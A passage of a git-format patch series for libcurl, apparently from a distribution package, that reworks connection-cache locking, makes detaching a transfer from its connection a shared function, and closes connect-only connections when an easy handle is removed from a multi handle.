+ lib/url.c             | 69 ++++++++++++++++++----------------
+ tests/data/test1554   | 14 +++++++
+ tests/unit/unit1620.c |  6 +--
+ 10 files changed, 139 insertions(+), 127 deletions(-)
+
+diff --git a/lib/conncache.c b/lib/conncache.c
+index cbd3bb1..95fcea6 100644
+--- a/lib/conncache.c
++++ b/lib/conncache.c
+@@ -49,53 +49,51 @@ static void conn_llist_dtor(void *user, void *element)
+   conn->bundle = NULL;
+ }
+ 
+-static CURLcode bundle_create(struct Curl_easy *data,
+-                              struct connectbundle **cb_ptr)
++static CURLcode bundle_create(struct connectbundle **bundlep)
+ {
+-  (void)data;
+-  DEBUGASSERT(*cb_ptr == NULL);
+-  *cb_ptr = malloc(sizeof(struct connectbundle));
+-  if(!*cb_ptr)
++  DEBUGASSERT(*bundlep == NULL);
++  *bundlep = malloc(sizeof(struct connectbundle));
++  if(!*bundlep)
+     return CURLE_OUT_OF_MEMORY;
+ 
+-  (*cb_ptr)->num_connections = 0;
+-  (*cb_ptr)->multiuse = BUNDLE_UNKNOWN;
++  (*bundlep)->num_connections = 0;
++  (*bundlep)->multiuse = BUNDLE_UNKNOWN;
+ 
+-  Curl_llist_init(&(*cb_ptr)->conn_list, (curl_llist_dtor) conn_llist_dtor);
++  Curl_llist_init(&(*bundlep)->conn_list, (curl_llist_dtor) conn_llist_dtor);
+   return CURLE_OK;
+ }
+ 
+-static void bundle_destroy(struct connectbundle *cb_ptr)
++static void bundle_destroy(struct connectbundle *bundle)
+ {
+-  if(!cb_ptr)
++  if(!bundle)
+     return;
+ 
+-  Curl_llist_destroy(&cb_ptr->conn_list, NULL);
++  Curl_llist_destroy(&bundle->conn_list, NULL);
+ 
+-  free(cb_ptr);
++  free(bundle);
+ }
+ 
+ /* Add a connection to a bundle */
+-static void bundle_add_conn(struct connectbundle *cb_ptr,
++static void bundle_add_conn(struct connectbundle *bundle,
+                             struct connectdata *conn)
+ {
+-  Curl_llist_insert_next(&cb_ptr->conn_list, cb_ptr->conn_list.tail, conn,
++  Curl_llist_insert_next(&bundle->conn_list, bundle->conn_list.tail, conn,
+                          &conn->bundle_node);
+-  conn->bundle = cb_ptr;
+-  cb_ptr->num_connections++;
++  conn->bundle = bundle;
++  bundle->num_connections++;
+ }
+ 
+ /* Remove a connection from a bundle */
+-static int bundle_remove_conn(struct connectbundle *cb_ptr,
++static int bundle_remove_conn(struct connectbundle *bundle,
+                               struct connectdata *conn)
+ {
+   struct curl_llist_element *curr;
+ 
+-  curr = cb_ptr->conn_list.head;
++  curr = bundle->conn_list.head;
+   while(curr) {
+     if(curr->ptr == conn) {
+-      Curl_llist_remove(&cb_ptr->conn_list, curr, NULL);
+-      cb_ptr->num_connections--;
++      Curl_llist_remove(&bundle->conn_list, curr, NULL);
++      bundle->num_connections--;
+       conn->bundle = NULL;
+       return 1; /* we removed a handle */
+     }
+@@ -162,20 +160,15 @@ static void hashkey(struct connectdata *conn, char *buf,
+   msnprintf(buf, len, "%ld%s", port, hostname);
+ }
+ 
+-void Curl_conncache_unlock(struct Curl_easy *data)
+-{
+-  CONN_UNLOCK(data);
+-}
+-
+ /* Returns number of connections currently held in the connection cache.
+    Locks/unlocks the cache itself!
+ */
+ size_t Curl_conncache_size(struct Curl_easy *data)
+ {
+   size_t num;
+-  CONN_LOCK(data);
++  CONNCACHE_LOCK(data);
+   num = data->state.conn_cache->num_conn;
+-  CONN_UNLOCK(data);
++  CONNCACHE_UNLOCK(data);
+   return num;
+ }
+ 
+@@ -188,7 +181,7 @@ struct connectbundle *Curl_conncache_find_bundle(struct connectdata *conn,
+                                                  const char **hostp)
+ {
+   struct connectbundle *bundle = NULL;
+-  CONN_LOCK(conn->data);
++  CONNCACHE_LOCK(conn->data);
+   if(connc) {
+     char key[HASHKEY_SIZE];
+     hashkey(conn, key, sizeof(key), hostp);
+@@ -235,8 +228,7 @@ CURLcode Curl_conncache_add_conn(struct conncache *connc,
+                                  struct connectdata *conn)
+ {
+   CURLcode result = CURLE_OK;
+-  struct connectbundle *bundle;
+-  struct connectbundle *new_bundle = NULL;
++  struct connectbundle *bundle = NULL;
+   struct Curl_easy *data = conn->data;
+ 
+   /* *find_bundle() locks the connection cache */
+@@ -245,20 +237,19 @@ CURLcode Curl_conncache_add_conn(struct conncache *connc,
+     int rc;
+     char key[HASHKEY_SIZE];
+ 
+-    result = bundle_create(data, &new_bundle);
++    result = bundle_create(&bundle);
+     if(result) {
+       goto unlock;
+     }
+ 
+     hashkey(conn, key, sizeof(key), NULL);
+-    rc = conncache_add_bundle(data->state.conn_cache, key, new_bundle);
++    rc = conncache_add_bundle(data->state.conn_cache, key, bundle);
+ 
+     if(!rc) {
+-      bundle_destroy(new_bundle);
++      bundle_destroy(bundle);
+       result = CURLE_OUT_OF_MEMORY;
+       goto unlock;
+     }
+-    bundle = new_bundle;
+   }
+ 
+   bundle_add_conn(bundle, conn);
+@@ -270,15 +261,17 @@ CURLcode Curl_conncache_add_conn(struct conncache *connc,
+                conn->connection_id, connc->num_conn));
+ 
+   unlock:
+-  CONN_UNLOCK(data);
++  CONNCACHE_UNLOCK(data);
+ 
+   return result;
+ }
+ 
+ /*
+- * Removes the connectdata object from the connection cache *and* clears the
+- * ->data pointer association. Pass TRUE/FALSE in the 'lock' argument
+- * depending on if the parent function already holds the lock or not.
++ * Removes the connectdata object from the connection cache, but does *not*
++ * clear the conn->data association. The transfer still owns this connection.
++ *
++ * Pass TRUE/FALSE in the 'lock' argument depending on if the parent function
++ * already holds the lock or not.
+  */
+ void Curl_conncache_remove_conn(struct Curl_easy *data,
+                                 struct connectdata *conn, bool lock)
+@@ -290,7 +283,7 @@ void Curl_conncache_remove_conn(struct Curl_easy *data,
+      due to a failed connection attempt, before being added to a bundle */
+   if(bundle) {
+     if(lock) {
+-      CONN_LOCK(data);
++      CONNCACHE_LOCK(data);
+     }
+     bundle_remove_conn(bundle, conn);
+     if(bundle->num_connections == 0)
+@@ -301,9 +294,8 @@ void Curl_conncache_remove_conn(struct Curl_easy *data,
+       DEBUGF(infof(data, "The cache now contains %zu members\n",
+                    connc->num_conn));
+     }
+-    conn->data = NULL; /* clear the association */
+     if(lock) {
+-      CONN_UNLOCK(data);
++      CONNCACHE_UNLOCK(data);
+     }
+   }
+ }
+@@ -332,7 +324,7 @@ bool Curl_conncache_foreach(struct Curl_easy *data,
+   if(!connc)
+     return FALSE;
+ 
+-  CONN_LOCK(data);
++  CONNCACHE_LOCK(data);
+   Curl_hash_start_iterate(&connc->hash, &iter);
+ 
+   he = Curl_hash_next_element(&iter);
+@@ -350,12 +342,12 @@ bool Curl_conncache_foreach(struct Curl_easy *data,
+       curr = curr->next;
+ 
+       if(1 == func(conn, param)) {
+-        CONN_UNLOCK(data);
++        CONNCACHE_UNLOCK(data);
+         return TRUE;
+       }
+     }
+   }
+-  CONN_UNLOCK(data);
++  CONNCACHE_UNLOCK(data);
+   return FALSE;
+ }
+ 
+@@ -494,7 +486,7 @@ Curl_conncache_extract_oldest(struct Curl_easy *data)
+ 
+   now = Curl_now();
+ 
+-  CONN_LOCK(data);
++  CONNCACHE_LOCK(data);
+   Curl_hash_start_iterate(&connc->hash, &iter);
+ 
+   he = Curl_hash_next_element(&iter);
+@@ -531,7 +523,7 @@ Curl_conncache_extract_oldest(struct Curl_easy *data)
+                  connc->num_conn));
+     conn_candidate->data = data; /* associate! */
+   }
+-  CONN_UNLOCK(data);
++  CONNCACHE_UNLOCK(data);
+ 
+   return conn_candidate;
+ }
+@@ -548,6 +540,7 @@ void Curl_conncache_close_all_connections(struct conncache *connc)
+     sigpipe_ignore(conn->data, &pipe_st);
+     /* This will remove the connection from the cache */
+     connclose(conn, "kill all");
++    Curl_conncache_remove_conn(conn->data, conn, TRUE);
+     (void)Curl_disconnect(connc->closure_handle, conn, FALSE);
+     sigpipe_restore(&pipe_st);
+ 
+diff --git a/lib/conncache.h b/lib/conncache.h
+index e3e4c9c..3dda21c 100644
+--- a/lib/conncache.h
++++ b/lib/conncache.h
+@@ -45,21 +45,21 @@ struct conncache {
+ #ifdef CURLDEBUG
+ /* the debug versions of these macros make extra certain that the lock is
+    never doubly locked or unlocked */
+-#define CONN_LOCK(x) if((x)->share) {                                   \
++#define CONNCACHE_LOCK(x) if((x)->share) {                              \
+     Curl_share_lock((x), CURL_LOCK_DATA_CONNECT, CURL_LOCK_ACCESS_SINGLE); \
+     DEBUGASSERT(!(x)->state.conncache_lock);                            \
+     (x)->state.conncache_lock = TRUE;                                   \
+   }
+ 
+-#define CONN_UNLOCK(x) if((x)->share) {                                 \
++#define CONNCACHE_UNLOCK(x) if((x)->share) {                            \
+     DEBUGASSERT((x)->state.conncache_lock);                             \
+     (x)->state.conncache_lock = FALSE;                                  \
+     Curl_share_unlock((x), CURL_LOCK_DATA_CONNECT);                     \
+   }
+ #else
+-#define CONN_LOCK(x) if((x)->share)                                     \
++#define CONNCACHE_LOCK(x) if((x)->share)                                \
+     Curl_share_lock((x), CURL_LOCK_DATA_CONNECT, CURL_LOCK_ACCESS_SINGLE)
+-#define CONN_UNLOCK(x) if((x)->share)                   \
++#define CONNCACHE_UNLOCK(x) if((x)->share)              \
+     Curl_share_unlock((x), CURL_LOCK_DATA_CONNECT)
+ #endif
+ 
+@@ -77,7 +77,6 @@ void Curl_conncache_destroy(struct conncache *connc);
+ struct connectbundle *Curl_conncache_find_bundle(struct connectdata *conn,
+                                                  struct conncache *connc,
+                                                  const char **hostp);
+-void Curl_conncache_unlock(struct Curl_easy *data);
+ /* returns number of connections currently held in the connection cache */
+ size_t Curl_conncache_size(struct Curl_easy *data);
+ 
+diff --git a/lib/hostip.c b/lib/hostip.c
+index c0feb79..f5bb634 100644
+--- a/lib/hostip.c
++++ b/lib/hostip.c
+@@ -1085,10 +1085,12 @@ CURLcode Curl_once_resolved(struct connectdata *conn,
+ 
+   result = Curl_setup_conn(conn, protocol_done);
+ 
+-  if(result)
+-    /* We're not allowed to return failure with memory left allocated
+-       in the connectdata struct, free those here */
+-    Curl_disconnect(conn->data, conn, TRUE); /* close the connection */
+-
++  if(result) {
++    struct Curl_easy *data = conn->data;
++    DEBUGASSERT(data);
++    Curl_detach_connnection(data);
++    Curl_conncache_remove_conn(data, conn, TRUE);
++    Curl_disconnect(data, conn, TRUE);
++  }
+   return result;
+ }
+diff --git a/lib/http_negotiate.h b/lib/http_negotiate.h
+index 4f0ac16..a737f6f 100644
+--- a/lib/http_negotiate.h
++++ b/lib/http_negotiate.h
+@@ -7,7 +7,7 @@
+  *                            | (__| |_| |  _ <| |___
+  *                             \___|\___/|_| \_\_____|
+  *
+- * Copyright (C) 1998 - 2019, Daniel Stenberg, <daniel@haxx.se>, et al.
++ * Copyright (C) 1998 - 2020, Daniel Stenberg, <daniel@haxx.se>, et al.
+  *
+  * This software is licensed as described in the file COPYING, which
+  * you should have received as part of this distribution. The terms
+@@ -33,6 +33,8 @@ CURLcode Curl_output_negotiate(struct connectdata *conn, bool proxy);
+ 
+ void Curl_http_auth_cleanup_negotiate(struct connectdata *conn);
+ 
+-#endif /* !CURL_DISABLE_HTTP && USE_SPNEGO */
++#else /* !CURL_DISABLE_HTTP && USE_SPNEGO */
++#define Curl_http_auth_cleanup_negotiate(x)
++#endif
+ 
+ #endif /* HEADER_CURL_HTTP_NEGOTIATE_H */
+diff --git a/lib/http_ntlm.h b/lib/http_ntlm.h
+index 003714d..3ebdf97 100644
+--- a/lib/http_ntlm.h
++++ b/lib/http_ntlm.h
+@@ -7,7 +7,7 @@
+  *                            | (__| |_| |  _ <| |___
+  *                             \___|\___/|_| \_\_____|
+  *
+- * Copyright (C) 1998 - 2019, Daniel Stenberg, <daniel@haxx.se>, et al.
++ * Copyright (C) 1998 - 2020, Daniel Stenberg, <daniel@haxx.se>, et al.
+  *
+  * This software is licensed as described in the file COPYING, which
+  * you should have received as part of this distribution. The terms
+@@ -35,6 +35,8 @@ CURLcode Curl_output_ntlm(struct connectdata *conn, bool proxy);
+ 
+ void Curl_http_auth_cleanup_ntlm(struct connectdata *conn);
+ 
+-#endif /* !CURL_DISABLE_HTTP && USE_NTLM */
++#else /* !CURL_DISABLE_HTTP && USE_NTLM */
++#define Curl_http_auth_cleanup_ntlm(x)
++#endif
+ 
+ #endif /* HEADER_CURL_HTTP_NTLM_H */
+diff --git a/lib/multi.c b/lib/multi.c
+index e10e752..273653d 100644
+--- a/lib/multi.c
++++ b/lib/multi.c
+@@ -79,7 +79,6 @@ static CURLMcode add_next_timeout(struct curltime now,
+ static CURLMcode multi_timeout(struct Curl_multi *multi,
+                                long *timeout_ms);
+ static void process_pending_handles(struct Curl_multi *multi);
+-static void detach_connnection(struct Curl_easy *data);
+ 
+ #ifdef DEBUGBUILD
+ static const char * const statename[]={
+@@ -112,7 +111,7 @@ static void Curl_init_completed(struct Curl_easy *data)
+ 
+   /* Important: reset the conn pointer so that we don't point to memory
+      that could be freed anytime */
+-  detach_connnection(data);
++  Curl_detach_connnection(data);
+   Curl_expire_clear(data); /* stop all timers */
+ }
+ 
+@@ -506,6 +505,7 @@ CURLMcode curl_multi_add_handle(struct Curl_multi *multi,
+      easy handle is added */
+   memset(&multi->timer_lastcall, 0, sizeof(multi->timer_lastcall));
+ 
++  CONNCACHE_LOCK(data);
+   /* The closure handle only ever has default timeouts set. To improve the
+      state somewhat we clone the timeouts from each added handle so that the
+      closure handle always has the same timeouts as the most recently added
+@@ -515,6 +515,7 @@ CURLMcode curl_multi_add_handle(struct Curl_multi *multi,
+     data->set.server_response_timeout;
+   data->state.conn_cache->closure_handle->set.no_signal =
+     data->set.no_signal;
++  CONNCACHE_UNLOCK(data);
+ 
+   Curl_update_timer(multi);
+   return CURLM_OK;
+@@ -589,14 +590,14 @@ static CURLcode multi_done(struct Curl_easy *data,
+ 
+   process_pending_handles(data->multi); /* connection / multiplex */
+ 
+-  CONN_LOCK(data);
+-  detach_connnection(data);
++  CONNCACHE_LOCK(data);
++  Curl_detach_connnection(data);
+   if(CONN_INUSE(conn)) {
+     /* Stop if still used. */
+     /* conn->data must not remain pointing to this transfer since it is going
+        away! Find another to own it! */
+     conn->data = conn->easyq.head->ptr;
+-    CONN_UNLOCK(data);
++    CONNCACHE_UNLOCK(data);
+     DEBUGF(infof(data, "Connection still in use %zu, "
+                  "no more multi_done now!\n",
+                  conn->easyq.size));
+@@ -647,7 +648,8 @@ static CURLcode multi_done(struct Curl_easy *data,
+        || (premature && !(conn->handler->flags & PROTOPT_STREAM))) {
+     CURLcode res2;
+     connclose(conn, "disconnecting");
+-    CONN_UNLOCK(data);
++    Curl_conncache_remove_conn(data, conn, FALSE);
++    CONNCACHE_UNLOCK(data);
+     res2 = Curl_disconnect(data, conn, premature);
+ 
+     /* If we had an error already, make sure we return that one. But
+@@ -666,7 +668,7 @@ static CURLcode multi_done(struct Curl_easy *data,
+               conn->bits.conn_to_host ? conn->conn_to_host.dispname :
+               conn->host.dispname);
+     /* the connection is no longer in use by this transfer */
+-    CONN_UNLOCK(data);
++    CONNCACHE_UNLOCK(data);
+     if(Curl_conncache_return_conn(data, conn)) {
+       /* remember the most recently used connection */
+       data->state.lastconnect = conn;
+@@ -774,8 +776,7 @@ CURLMcode curl_multi_remove_handle(struct Curl_multi *multi,
+                                 vanish with this handle */
+ 
+   /* Remove the association between the connection and the handle */
+-  if(data->conn)
+-    detach_connnection(data);
++  Curl_detach_connnection(data);
+ 
+ #ifdef USE_LIBPSL
+   /* Remove the PSL association. */
+@@ -824,9 +825,13 @@ bool Curl_multiplex_wanted(const struct Curl_multi *multi)
+   return (multi && (multi->multiplexing));
+ }
+ 
+-/* This is the only function that should clear data->conn. This will
+-   occasionally be called with the pointer already cleared. */
+-static void detach_connnection(struct Curl_easy *data)
++/*
++ * Curl_detach_connnection() removes the given transfer from the connection.
++ *
++ * This is the only function that should clear data->conn. This will
++ * occasionally be called with the data->conn pointer already cleared.
++ */
++void Curl_detach_connnection(struct Curl_easy *data)
+ {
+   struct connectdata *conn = data->conn;
+   if(conn)
+@@ -834,7 +839,11 @@ static void detach_connnection(struct Curl_easy *data)
+   data->conn = NULL;
+ }
+ 
+-/* This is the only function that should assign data->conn */
++/*
++ * Curl_attach_connnection() attaches this transfer to this connection.
++ *
++ * This is the only function that should assign data->conn
++ */
+ void Curl_attach_connnection(struct Curl_easy *data,
+                              struct connectdata *conn)
+ {
+@@ -1536,19 +1545,6 @@ static CURLMcode multi_runsingle(struct Curl_multi *multi,
+     bool stream_error = FALSE;
+     rc = CURLM_OK;
+ 
+-    DEBUGASSERT((data->mstate <= CURLM_STATE_CONNECT) ||
+-                (data->mstate >= CURLM_STATE_DONE) ||
+-                data->conn);
+-    if(!data->conn &&
+-       data->mstate > CURLM_STATE_CONNECT &&
+-       data->mstate < CURLM_STATE_DONE) {
+-      /* In all these states, the code will blindly access 'data->conn'
+-         so this is precaution that it isn't NULL. And it silences static
+-         analyzers. */
+-      failf(data, "In state %d with no conn, bail out!\n", data->mstate);
+-      return CURLM_INTERNAL_ERROR;
+-    }
+-
+     if(multi_ischanged(multi, TRUE)) {
+       DEBUGF(infof(data, "multi changed, check CONNECT_PEND queue!\n"));
+       process_pending_handles(multi); /* multiplexed */
+@@ -2231,8 +2227,7 @@ static CURLMcode multi_runsingle(struct Curl_multi *multi,
+          * access free'd data, if the connection is free'd and the handle
+          * removed before we perform the processing in CURLM_STATE_COMPLETED
+          */
+-        if(data->conn)
+-          detach_connnection(data);
++        Curl_detach_connnection(data);
+       }
+ 
+ #ifndef CURL_DISABLE_FTP
+@@ -2284,7 +2279,10 @@ static CURLMcode multi_runsingle(struct Curl_multi *multi,
+             /* This is where we make sure that the conn pointer is reset.
+                We don't have to do this in every case block above where a
+                failure is detected */
+-            detach_connnection(data);
++            Curl_detach_connnection(data);
++
++            /* remove connection from cache */
++            Curl_conncache_remove_conn(data, conn, TRUE);
+ 
+             /* disconnect properly */
+             Curl_disconnect(data, conn, dead_connection);
+diff --git a/lib/multiif.h b/lib/multiif.h
+index bde755e..c07587b 100644
+--- a/lib/multiif.h
++++ b/lib/multiif.h
+@@ -33,6 +33,7 @@ void Curl_expire_done(struct Curl_easy *data, expire_id id);
+ void Curl_update_timer(struct Curl_multi *multi);
+ void Curl_attach_connnection(struct Curl_easy *data,
+                              struct connectdata *conn);
++void Curl_detach_connnection(struct Curl_easy *data);
+ bool Curl_multiplex_wanted(const struct Curl_multi *multi);
+ void Curl_set_in_callback(struct Curl_easy *data, bool value);
+ bool Curl_is_in_callback(struct Curl_easy *easy);
+diff --git a/lib/url.c b/lib/url.c
+index a826f8a..4ed0623 100644
+--- a/lib/url.c
++++ b/lib/url.c
+@@ -679,9 +679,7 @@ static void conn_reset_all_postponed_data(struct connectdata *conn)
+ 
+ static void conn_shutdown(struct connectdata *conn)
+ {
+-  if(!conn)
+-    return;
+-
++  DEBUGASSERT(conn);
+   infof(conn->data, "Closing connection %ld\n", conn->connection_id);
+   DEBUGASSERT(conn->data);
+ 
+@@ -702,16 +700,11 @@ static void conn_shutdown(struct connectdata *conn)
+     Curl_closesocket(conn, conn->tempsock[0]);
+   if(CURL_SOCKET_BAD != conn->tempsock[1])
+     Curl_closesocket(conn, conn->tempsock[1]);
+-
+-  /* unlink ourselves. this should be called last since other shutdown
+-     procedures need a valid conn->data and this may clear it. */
+-  Curl_conncache_remove_conn(conn->data, conn, TRUE);
+ }
+ 
+ static void conn_free(struct connectdata *conn)
+ {
+-  if(!conn)
+-    return;
++  DEBUGASSERT(conn);
+ 
+   Curl_free_idnconverted_hostname(&conn->host);
+   Curl_free_idnconverted_hostname(&conn->conn_to_host);
+@@ -778,13 +771,17 @@ static void conn_free(struct connectdata *conn)
+ CURLcode Curl_disconnect(struct Curl_easy *data,
+                          struct connectdata *conn, bool dead_connection)
+ {
+-  if(!conn)
+-    return CURLE_OK; /* this is closed and fine already */
++  /* there must be a connection to close */
++  DEBUGASSERT(conn);
+ 
+-  if(!data) {
+-    DEBUGF(infof(data, "DISCONNECT without easy handle, ignoring\n"));
+-    return CURLE_OK;
+-  }
++  /* it must be removed from the connection cache */
++  DEBUGASSERT(!conn->bundle);
++
++  /* there must be an associated transfer */
++  DEBUGASSERT(data);
++
++  /* the transfer must be detached from the connection */
++  DEBUGASSERT(!data->conn);
+ 
+   /*
+    * If this connection isn't marked to force-close, leave it open if there
+@@ -800,16 +797,11 @@ CURLcode Curl_disconnect(struct Curl_easy *data,
+     conn->dns_entry = NULL;
+   }
+ 
+-  Curl_hostcache_prune(data); /* kill old DNS cache entries */
+-
+-#if !defined(CURL_DISABLE_HTTP) && defined(USE_NTLM)
+   /* Cleanup NTLM connection-related data */
+   Curl_http_auth_cleanup_ntlm(conn);
+-#endif
+-#if !defined(CURL_DISABLE_HTTP) && defined(USE_SPNEGO)
++
+   /* Cleanup NEGOTIATE connection-related data */
+   Curl_http_auth_cleanup_negotiate(conn);
+-#endif
+ 
+   /* the protocol specific disconnect handler and conn_shutdown need a transfer
+      for the connection! */
+@@ -1006,8 +998,12 @@ static int call_extract_if_dead(struct connectdata *conn, void *param)
+ static void prune_dead_connections(struct Curl_easy *data)
+ {
+   struct curltime now = Curl_now();
+-  timediff_t elapsed =
++  timediff_t elapsed;
++
++  CONNCACHE_LOCK(data);
++  elapsed =
+     Curl_timediff(now, data->state.conn_cache->last_cleanup);
++  CONNCACHE_UNLOCK(data);
+ 
+   if(elapsed >= 1000L) {
+     struct prunedead prune;
+@@ -1015,10 +1011,17 @@ static void prune_dead_connections(struct Curl_easy *data)
+     prune.extracted = NULL;
+     while(Curl_conncache_foreach(data, data->state.conn_cache, &prune,
+                                  call_extract_if_dead)) {
++      /* unlocked */
++
++      /* remove connection from cache */
++      Curl_conncache_remove_conn(data, prune.extracted, TRUE);
++
+       /* disconnect it */
+       (void)Curl_disconnect(data, prune.extracted, /* dead_connection */TRUE);
+     }
++    CONNCACHE_LOCK(data);
+     data->state.conn_cache->last_cleanup = now;
++    CONNCACHE_UNLOCK(data);
+   }
+ }
+ 
+@@ -1078,7 +1081,7 @@ ConnectionExists(struct Curl_easy *data,
+         if(data->set.pipewait) {
+           infof(data, "Server doesn't support multiplex yet, wait\n");
+           *waitpipe = TRUE;
+-          Curl_conncache_unlock(data);
++          CONNCACHE_UNLOCK(data);
+           return FALSE; /* no re-use */
+         }
+ 
+@@ -1402,11 +1405,12 @@ ConnectionExists(struct Curl_easy *data,
+   if(chosen) {
+     /* mark it as used before releasing the lock */
+     chosen->data = data; /* own it! */
+-    Curl_conncache_unlock(data);
++    Curl_attach_connnection(data, chosen);
++    CONNCACHE_UNLOCK(data);
+     *usethis = chosen;
+     return TRUE; /* yes, we found one to use! */
+   }
+-  Curl_conncache_unlock(data);
++  CONNCACHE_UNLOCK(data);
+ 
+   if(foundPendingCandidate && data->set.pipewait) {
+     infof(data,
+@@ -3519,6 +3523,7 @@ static CURLcode create_conn(struct Curl_easy *data,
+     if(!result) {
+       conn->bits.tcpconnect[FIRSTSOCKET] = TRUE; /* we are "connected */
+ 
++      Curl_attach_connnection(data, conn);
+       result = Curl_conncache_add_conn(data->state.conn_cache, conn);
+       if(result)
+         goto out;
+@@ -3533,7 +3538,6 @@ static CURLcode create_conn(struct Curl_easy *data,
+         (void)conn->handler->done(conn, result, FALSE);
+         goto out;
+       }
+-      Curl_attach_connnection(data, conn);
+       Curl_setup_transfer(data, -1, -1, FALSE, -1);
+     }
+ 
+@@ -3683,7 +3687,7 @@ static CURLcode create_conn(struct Curl_easy *data,
+ 
+         /* The bundle is full. Extract the oldest connection. */
+         conn_candidate = Curl_conncache_extract_bundle(data, bundle);
+-        Curl_conncache_unlock(data);
++        CONNCACHE_UNLOCK(data);
+ 
+         if(conn_candidate)
+           (void)Curl_disconnect(data, conn_candidate,
+@@ -3695,7 +3699,7 @@ static CURLcode create_conn(struct Curl_easy *data,
+         }
+       }
+       else
+-        Curl_conncache_unlock(data);
++        CONNCACHE_UNLOCK(data);
+ 
+     }
+ 
+@@ -3729,6 +3733,8 @@ static CURLcode create_conn(struct Curl_easy *data,
+        * This is a brand new connection, so let's store it in the connection
+        * cache of ours!
+        */
++      Curl_attach_connnection(data, conn);
++
+       result = Curl_conncache_add_conn(data->state.conn_cache, conn);
+       if(result)
+         goto out;
+@@ -3883,7 +3889,7 @@ CURLcode Curl_connect(struct Curl_easy *data,
+   result = create_conn(data, &conn, asyncp);
+ 
+   if(!result) {
+-    if(CONN_INUSE(conn))
++    if(CONN_INUSE(conn) > 1)
+       /* multiplexed */
+       *protocol_done = TRUE;
+     else if(!*asyncp) {
+@@ -3900,11 +3906,10 @@ CURLcode Curl_connect(struct Curl_easy *data,
+   else if(result && conn) {
+     /* We're not allowed to return failure with memory left allocated in the
+        connectdata struct, free those here */
++    Curl_detach_connnection(data);
++    Curl_conncache_remove_conn(data, conn, TRUE);
+     Curl_disconnect(data, conn, TRUE);
+   }
+-  else if(!result && !data->conn)
+-    /* FILE: transfers already have the connection attached */
+-    Curl_attach_connnection(data, conn);
+ 
+   return result;
+ }
+diff --git a/tests/data/test1554 b/tests/data/test1554
+index 06f1897..d3926d9 100644
+--- a/tests/data/test1554
++++ b/tests/data/test1554
+@@ -29,6 +29,12 @@ run 1: foobar and so on fun!
+ <- Mutex unlock
+ -> Mutex lock
+ <- Mutex unlock
++-> Mutex lock
++<- Mutex unlock
++-> Mutex lock
++<- Mutex unlock
++-> Mutex lock
++<- Mutex unlock
+ run 1: foobar and so on fun!
+ -> Mutex lock
+ <- Mutex unlock
+@@ -40,6 +46,10 @@ run 1: foobar and so on fun!
+ <- Mutex unlock
+ -> Mutex lock
+ <- Mutex unlock
++-> Mutex lock
++<- Mutex unlock
++-> Mutex lock
++<- Mutex unlock
+ run 1: foobar and so on fun!
+ -> Mutex lock
+ <- Mutex unlock
+@@ -51,6 +61,10 @@ run 1: foobar and so on fun!
+ <- Mutex unlock
+ -> Mutex lock
+ <- Mutex unlock
++-> Mutex lock
++<- Mutex unlock
++-> Mutex lock
++<- Mutex unlock
+ run 1: foobar and so on fun!
+ -> Mutex lock
+ <- Mutex unlock
+diff --git a/tests/unit/unit1620.c b/tests/unit/unit1620.c
+index 6e572c6..b23e5b9 100644
+--- a/tests/unit/unit1620.c
++++ b/tests/unit/unit1620.c
+@@ -5,7 +5,7 @@
+  *                            | (__| |_| |  _ <| |___
+  *                             \___|\___/|_| \_\_____|
+  *
+- * Copyright (C) 1998 - 2019, Daniel Stenberg, <daniel@haxx.se>, et al.
++ * Copyright (C) 1998 - 2020, Daniel Stenberg, <daniel@haxx.se>, et al.
+  *
+  * This software is licensed as described in the file COPYING, which
+  * you should have received as part of this distribution. The terms
+@@ -73,10 +73,6 @@ UNITTEST_START
+   fail_unless(rc == CURLE_OK,
+               "Curl_parse_login_details() failed");
+ 
+-  rc = Curl_disconnect(empty, empty->conn, FALSE);
+-  fail_unless(rc == CURLE_OK,
+-              "Curl_disconnect() with dead_connection set FALSE failed");
+-
+   Curl_freeset(empty);
+   for(i = (enum dupstring)0; i < STRING_LAST; i++) {
+     fail_unless(empty->set.str[i] == NULL,
+-- 
+2.25.4
+
+
+From 6830828c9eecd9ab14404f2f49f19b56dec62130 Mon Sep 17 00:00:00 2001
+From: Marc Aldorasi <marc@groundctl.com>
+Date: Thu, 30 Jul 2020 14:16:17 -0400
+Subject: [PATCH 2/3] multi_remove_handle: close unused connect-only
+ connections
+
+Previously any connect-only connections in a multi handle would be kept
+alive until the multi handle was closed.  Since these connections cannot
+be re-used, they can be marked for closure when the associated easy
+handle is removed from the multi handle.
+
+Closes #5749
+
+Upstream-commit: d5bb459ccf1fc5980ae4b95c05b4ecf6454a7599
+Signed-off-by: Kamil Dudka <kdudka@redhat.com>
+---
+ lib/multi.c         | 34 ++++++++++++++++++++++++++++++----
+ tests/data/test1554 |  6 ++++++
+ 2 files changed, 36 insertions(+), 4 deletions(-)
+
+diff --git a/lib/multi.c b/lib/multi.c
+index 249e360..f1371bd 100644
+--- a/lib/multi.c
++++ b/lib/multi.c
+@@ -682,6 +682,26 @@ static CURLcode multi_done(struct Curl_easy *data,
+   return result;
+ }
+ 
++static int close_connect_only(struct connectdata *conn, void *param)
++{
++  struct Curl_easy *data = param;
++
++  if(data->state.lastconnect != conn)
++    return 0;
++
++  if(conn->data != data)
++    return 1;
++  conn->data = NULL;
++
++  if(!conn->bits.connect_only)
++    return 1;
++
++  connclose(conn, "Removing connect-only easy handle");
++  conn->bits.connect_only = FALSE;
++
++  return 1;
++}
++
+ CURLMcode curl_multi_remove_handle(struct Curl_multi *multi,
+                                    struct Curl_easy *data)
+ {
+@@ -765,10 +785,6 @@ CURLMcode curl_multi_remove_handle(struct Curl_multi *multi,
+      multi_done() as that may actually call Curl_expire that uses this */
+   Curl_llist_destroy(&data->state.timeoutlist, NULL);
+ 
+-  /* as this was using a shared connection cache we clear the pointer to that
+-     since we're not part of that multi handle anymore */
+-  data->state.conn_cache = NULL;
+-
+   /* change state without using multistate(), only to make singlesocket() do
+      what we want */
+   data->mstate = CURLM_STATE_COMPLETED;
+@@ -778,12 +794,22 @@ CURLMcode curl_multi_remove_handle(struct Curl_multi *multi,
+   /* Remove the association between the connection and the handle */
+   Curl_detach_connnection(data);
+ 
++  if(data->state.lastconnect) {
++    /* Mark any connect-only connection for closure */
++    Curl_conncache_foreach(data, data->state.conn_cache,
++                           data, &close_connect_only);
++  }
++
+ #ifdef USE_LIBPSL
+   /* Remove the PSL association. */
+   if(data->psl == &multi->psl)
+     data->psl = NULL;
+ #endif
+ 
++  /* as this was using a shared connection cache we clear the pointer to that
++     since we're not part of that multi handle anymore */
++  data->state.conn_cache = NULL;
++
+   data->multi = NULL; /* clear the association to this multi handle */
+ 
